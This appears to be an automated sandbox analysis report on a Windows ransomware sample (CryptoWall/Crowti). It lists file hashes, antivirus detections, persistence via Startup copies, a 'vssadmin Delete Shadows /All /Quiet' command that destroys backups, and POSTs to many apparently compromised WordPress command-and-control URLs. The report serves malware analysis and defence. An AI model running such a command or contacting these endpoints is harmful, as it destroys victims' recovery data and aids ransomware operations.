Analysis Date2015-12-08 09:44:48
MD59bc348b33fa72da3bb32f91b10e0ad5e
SHA19f2ab90d3807007bb9c85c1ffc2349343493775b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: f8b45eb4ba38935632a4922176667784 sha1: f6fc284148dbc01ff96238bfe00ee976c7f34cf2 size: 73728
Section.rdata md5: 70c46a804bf95b1733efaa2e0b54417e sha1: d7a4dc264f1cd9f3227357d8009631b36a4ad9c4 size: 4096
Section.data md5: 197450fe35ac9116613cb8daaa72fc49 sha1: 124085e5325a3a22665f3cae7f57be75b84630ec size: 8192
Section.rsrc md5: 06d05e1b0a042d0dd5f8e12434d46082 sha1: 8808d7159415f7c91abcd70dd38ae87185e64874 size: 163840
Timestamp2007-08-19 18:59:40
VersionLegalCopyright: Mouthparts © 2018
ProductName: Flattest Gathers
FileVersion: 0,255,64,38
CompanyName: Memeo Inc.
PackerMicrosoft Visual C++ v6.0
PEhash4cb7b170086b654741dc31a55e974bbffa9ce234
IMPhash8138f8c8c60b43fd5d525ee6d0d477de
AVFrisk (f-prot)no_virus
AVMcafeeRansom-CWall.b
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVDr. WebTrojan.Encoder.514
AVMicrosoft Security EssentialsRansom:Win32/Crowti
AVF-SecureTrojan.GenericKD.2890184
AVCA (E-Trust Ino)no_virus
AVMicroWorld (escan)Trojan.GenericKD.2890184
AVBitDefenderTrojan.GenericKD.2890184
AVGrisoft (avg)Zbot.AKCB
AVPadvishno_virus
AVRisingno_virus
AVEmsisoftTrojan.GenericKD.2890184
AVArcabit (arcavir)Trojan.GenericKD.2890184
AVIkarusTrojan.Win32.Filecoder
AVCAT (quickheal)no_virus
AVSymantecTrojan.Cryptodefense
AVEset (nod32)Win32/Filecoder.CO
AVK7Trojan ( 004b96871 )
AVTrend MicroRansom_.F439C15A
AVAvira (antivir)TR/AD.Crowti.Y.603
AVBullGuardTrojan.GenericKD.2890184
AVTwisterno_virus
AVKasperskyno_virus
AVFortinetW32/Yakes.NNEX!tr
AVVirusBlokAda (vba32)no_virus
AVClamAVno_virus
AVMalwareBytesTrojan.Rovnix
AVZillya!no_virus
AVAuthentiumno_virus
AVAd-AwareTrojan.GenericKD.2890184

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process-k netsvcs
Creates Processvssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSautonomenab.se
Winsock DNSanime-tuner.square7.ch
Winsock DNSandersvision.com
Winsock DNSalexandra.uz
Winsock DNSabisoglu.com
Winsock DNSalf-shop.com.ua
Winsock DNSattcompany.com
Winsock DNSabrtl.com
Winsock DNS10bestdatingsites.dev.belugalab.com
Winsock DNSassomise.com.br
Winsock DNSaldgateeastescorts4u.eu
Winsock DNSbataviarealty.com
Winsock DNScurlmyip.com
Winsock DNSantoine.leclerc.photos
Winsock DNSamandabugge.dk
Winsock DNSatcoghost.com
Winsock DNS63notes.com
Winsock DNSavancarvisual.com.br
Winsock DNSboletininformativocma.tecsalud.mx
Winsock DNSadeolamedia.com
Winsock DNSmyexternalip.com
Winsock DNSbarbicanescorts4u.eu
Winsock DNSanimaskin.no
Winsock DNSip-addr.es
Winsock DNScrumerycpa.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNS10bestdatingsites.dev.belugalab.com
Type: A
95.85.47.44
DNSalf-shop.com.ua
Type: A
178.20.152.1
DNSassomise.com.br
Type: A
186.202.127.248
DNSamandabugge.dk
Type: A
104.27.144.88
DNSamandabugge.dk
Type: A
104.27.145.88
DNSandersvision.com
Type: A
109.72.85.200
DNSadeolamedia.com
Type: A
46.30.212.60
DNSabisoglu.com
Type: A
212.175.84.173
DNSatcoghost.com
Type: A
104.27.179.208
DNSatcoghost.com
Type: A
104.27.178.208
DNSanimaskin.no
Type: A
91.205.172.75
DNSalexandra.uz
Type: A
81.177.139.245
DNSbarbicanescorts4u.eu
Type: A
46.102.252.68
DNSabrtl.com
Type: A
46.30.212.147
DNSbataviarealty.com
Type: A
111.68.119.34
DNSanime-tuner.square7.ch
Type: A
148.251.48.69
DNSboletininformativocma.tecsalud.mx
Type: A
189.212.87.21
DNSavancarvisual.com.br
Type: A
189.26.236.163
DNSattcompany.com
Type: A
78.110.50.154
DNSantoine.leclerc.photos
Type: A
37.59.9.128
DNSaldgateeastescorts4u.eu
Type: A
46.102.252.68
DNS63notes.com
Type: A
173.248.136.212
DNSautonomenab.se
Type: A
46.30.212.119
DNScrumerycpa.com
Type: A
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://10bestdatingsites.dev.belugalab.com/wp-content/plugins/wp-db-ajax-made/UIWL5N.php?z=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://alf-shop.com.ua/wp-content/plugins/wp-db-backup-made/OIZw29.php?i=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://assomise.com.br/wp-content/plugins/wp-db-backup-made/4n8svu.php?c=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://amandabugge.dk/wp-content/plugins/wp-db-backup-made/Ve4wgx.php?t=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://andersvision.com/wp-content/plugins/wp-db-backup-made/yq9RrN.php?k=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://adeolamedia.com/wp-content/plugins/wp-db-backup-made/P_tfk9.php?u=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://abisoglu.com/wp-content/themes/twentythirteen/iLBfkn.php?w=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://atcoghost.com/wp-content/plugins/wp-db-backup-made/CRX7U9.php?a=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://animaskin.no/wp-content/themes/twentytwelve/gVa9E3.php?x=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://alexandra.uz/wp-content/themes/twentyeleven/VZo0pj.php?k=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://barbicanescorts4u.eu/wp-content/plugins/wp-db-backup-made/LOdI5b.php?x=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://abrtl.com/wp-content/plugins/wp-db-backup-made/3ILBop.php?k=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bataviarealty.com/wp-content/plugins/wp-db-backup-made/bcXklL.php?n=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://anime-tuner.square7.ch/wp-content/themes/twentyeleven/MsTGk_.php?i=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://boletininformativocma.tecsalud.mx/ifmY18.php?o=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://avancarvisual.com.br/wp-content/themes/twentytwelve/VzkgnX.php?b=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://attcompany.com/wp-content/themes/twentytwelve/x0CGOg.php?z=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://antoine.leclerc.photos/wp-content/themes/twentyeleven/EQDaXr.php?m=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aldgateeastescorts4u.eu/wp-content/plugins/wp-db-backup-made/YXzCAO.php?z=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://63notes.com/wp-content/plugins/wp-db-backup-made/kT_7yf.php?l=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://autonomenab.se/wp-content/plugins/wp-db-backup-made/H0zbxa.php?w=5kpc3t8hux7hc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 95.85.47.44:80
Flows TCP192.168.1.1:1035 ➝ 178.20.152.1:80
Flows TCP192.168.1.1:1036 ➝ 186.202.127.248:80
Flows TCP192.168.1.1:1037 ➝ 104.27.144.88:80
Flows TCP192.168.1.1:1038 ➝ 109.72.85.200:80
Flows TCP192.168.1.1:1039 ➝ 46.30.212.60:80
Flows TCP192.168.1.1:1040 ➝ 212.175.84.173:80
Flows TCP192.168.1.1:1041 ➝ 104.27.179.208:80
Flows TCP192.168.1.1:1042 ➝ 91.205.172.75:80
Flows TCP192.168.1.1:1043 ➝ 81.177.139.245:80
Flows TCP192.168.1.1:1044 ➝ 46.102.252.68:80
Flows TCP192.168.1.1:1045 ➝ 46.30.212.147:80
Flows TCP192.168.1.1:1046 ➝ 111.68.119.34:80
Flows TCP192.168.1.1:1047 ➝ 148.251.48.69:80
Flows TCP192.168.1.1:1048 ➝ 189.212.87.21:80
Flows TCP192.168.1.1:1049 ➝ 189.26.236.163:80
Flows TCP192.168.1.1:1050 ➝ 78.110.50.154:80
Flows TCP192.168.1.1:1051 ➝ 37.59.9.128:80
Flows TCP192.168.1.1:1052 ➝ 46.102.252.68:80
Flows TCP192.168.1.1:1053 ➝ 173.248.136.212:80
Flows TCP192.168.1.1:1054 ➝ 46.30.212.119:80

Raw Pcap

Strings